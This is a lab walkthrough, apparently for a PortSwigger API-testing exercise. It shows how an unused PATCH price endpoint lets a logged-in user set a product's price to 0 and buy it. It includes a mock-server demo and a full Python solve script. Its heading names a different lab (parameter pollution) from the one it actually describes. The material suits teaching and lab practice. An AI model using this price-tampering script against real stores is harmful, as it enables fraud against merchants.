2. Exploiting server-side parameter pollution in a query string
Accessing the webpage:


We have to buy this:

But we have to log in first:

We can see the API request in Burp Suite:

The endpoint returns the price of the product whose ID we set to 1 here:

We can also find the endpoint in the JavaScript file:


We do not have enough store credit to buy it, so we have to find another way:

Sending an OPTIONS request to list the allowed methods:

Let's try PATCH:

So we have to log in first:

After logging in and setting the session cookie:

Now it says that we have to use JSON in the Content-Type header, so let's set it and send an empty JSON object as the body:

Here we go: it says that we have to supply a parameter called price in the JSON body. Since we want to buy the Leet jacket, we set its price to 0 with the PATCH request so that we can afford it:

Let's see whether it changed on the website:
Here we go:

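The discovery ladder above (OPTIONS, PATCH without a session, PATCH without JSON, PATCH with an empty object, then PATCH with the price field, and a GET to confirm) as an added example; it is not part of the original writeup. It runs against a constructed mock of the lab's price endpoint started in a background thread, whose replies are modelled on the error messages seen in the walkthrough (assumption: the real server's wording may differ). The session cookie value, the product ID 1 and the starting price are made up for the demo, and the client side uses only the standard library so it runs offline.

```python
import json
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the lab's product API; its replies are modelled on the
# error messages seen in the walkthrough and it is not PortSwigger's server code.
PRICES = {"1": 1337.00}                       # constructed starting price
VALID_SESSION = "session=wiener-demo-cookie"  # constructed cookie for a logged-in user


class FakeProductApi(BaseHTTPRequestHandler):
    def log_message(self, *args):
        pass  # keep the demo output quiet

    def _reply(self, code, body=None, extra=None):
        data = b"" if body is None else json.dumps(body).encode()
        self.send_response(code)
        for name, value in (extra or {}).items():
            self.send_header(name, value)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def _product_id(self):
        parts = self.path.strip("/").split("/")
        is_price = len(parts) == 4 and parts[:2] == ["api", "products"] and parts[3] == "price"
        return parts[2] if is_price and parts[2] in PRICES else None

    def do_OPTIONS(self):
        # The front-end JavaScript only ever sends GET; PATCH is the unused method.
        self._reply(204, extra={"Allow": "GET, PATCH"})

    def do_GET(self):
        pid = self._product_id()
        if pid is None:
            return self._reply(404, {"error": "Not Found"})
        self._reply(200, {"price": f"${PRICES[pid]:.2f}"})

    def do_PATCH(self):
        pid = self._product_id()
        if pid is None:
            return self._reply(404, {"error": "Not Found"})
        if VALID_SESSION not in self.headers.get("Cookie", ""):
            return self._reply(401, {"error": "Unauthorized"})
        if self.headers.get("Content-Type", "").split(";")[0].strip() != "application/json":
            return self._reply(400, {"error": "Only 'application/json' Content-Type is supported"})
        raw = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        try:
            body = json.loads(raw or b"null")
        except ValueError:
            return self._reply(400, {"error": "Malformed JSON"})
        if not isinstance(body, dict) or "price" not in body:
            return self._reply(400, {"error": "'price' parameter missing in body"})
        PRICES[pid] = float(body["price"])  # the flaw: any logged-in user may set any price
        self._reply(200, {"price": f"${PRICES[pid]:.2f}"})


def call(method, url, body=None, headers=None):
    """Send one request; 4xx replies come back as data instead of being raised."""
    data = None if body is None else json.dumps(body).encode()
    req = urllib.request.Request(url, data=data, method=method, headers=headers or {})
    try:
        resp = urllib.request.urlopen(req, timeout=5)
    except urllib.error.HTTPError as err:
        resp = err
    raw = resp.read()
    return resp.code, resp.headers, (json.loads(raw) if raw else None)


def probe_unused_endpoint(base, product_id, session_cookie):
    """Walk the walkthrough's ladder and record what each step taught us."""
    ep = f"{base}/api/products/{product_id}/price"
    auth = {"Cookie": session_cookie}
    as_json = {**auth, "Content-Type": "application/json"}
    trail = {}
    _, hdrs, _ = call("OPTIONS", ep)
    trail["allow"] = [m.strip() for m in hdrs.get("Allow", "").split(",") if m.strip()]
    if "PATCH" not in trail["allow"]:
        return trail                                   # nothing unused to abuse
    trail["patch_anon"] = call("PATCH", ep)[0]         # no session: expect 401
    status, _, body = call("PATCH", ep, headers=auth)  # wrong Content-Type: error names the right one
    trail["patch_no_json"] = (status, body["error"])
    status, _, body = call("PATCH", ep, body={}, headers=as_json)  # empty object: error names the field
    trail["patch_empty"] = (status, body["error"])
    status, _, body = call("PATCH", ep, body={"price": 0}, headers=as_json)  # supply it
    trail["patch_price"] = (status, body)
    trail["final_price"] = call("GET", ep)[2]["price"]  # what the product page would now show
    return trail


def run_demo():
    PRICES["1"] = 1337.00  # reset so repeated runs start from the same state
    server = HTTPServer(("127.0.0.1", 0), FakeProductApi)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return probe_unused_endpoint(f"http://127.0.0.1:{server.server_port}", "1", VALID_SESSION)


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

The point of the ladder is that each error message hands over the next piece of the request (first the method, then the Content-Type, then the parameter name); against a real target the same `probe_unused_endpoint` can be pointed at the lab's base URL with the real session cookie, and the `trail` it returns is the evidence to put in the finding.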
Now we can buy it:

Solving it with a Python 3 script:
import os
import re
import sys

import requests
import urllib3

# Route every request through Burp so each step can be inspected; the lab's
# certificate is not trusted by the proxy chain, so silence the verify=False warning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080"
}
session = requests.session()
headers = {
    "Content-Type": "application/json"
}
price_data = {
    "price": 0
}


def Login(username, password):
    print("[*] Get CSRF Token.")
    csrf = re.findall(r'name="csrf" value="(.+?)"', session.get(url=url + "login", proxies=proxies, verify=False).text)
    print("[*] Logging In.")
    data = {"csrf": csrf[0], "username": username, "password": password}
    session.post(url=url + "login", data=data, allow_redirects=True, proxies=proxies, verify=False)


def PatchPrice():
    # The unused PATCH method on the price endpoint accepts a JSON body with a "price" field
    # and applies it without any authorisation check beyond being logged in.
    print("[*] Patch The Price To 0.")
    r = session.patch(url=url + "api/products/1/price", headers=headers, json=price_data, proxies=proxies, verify=False)
    print(f"[*] Server replied: {r.status_code} {r.text}")


def BuyProduct():
    form_headers = {
        "Content-Type": "application/x-www-form-urlencoded",
    }
    Product_data = "productId=1&redir=PRODUCT&quantity=1"
    print("[*] Adding The Product To Cart.")
    session.post(url=url + "cart", headers=form_headers, data=Product_data, allow_redirects=True, proxies=proxies, verify=False)
    csrf = re.findall(r'name="csrf" value="(.+?)"', session.get(url=url + "cart", proxies=proxies, verify=False).text)
    print("[*] Purchase The Product.")
    Checkout_data = f"csrf={csrf[0]}"
    session.post(url=url + "cart/checkout", data=Checkout_data, proxies=proxies, verify=False)


if __name__ == "__main__":
    if len(sys.argv) != 2:
        script_name = os.path.basename(__file__)
        print(f"[-] Usage: python {script_name} http://localhost/")
        sys.exit(1)
    url = sys.argv[1].rstrip("/") + "/"  # every path above is appended to this base URL
    Login("wiener", "peter")
    PatchPrice()
    BuyProduct()
    print("[+] Solved.")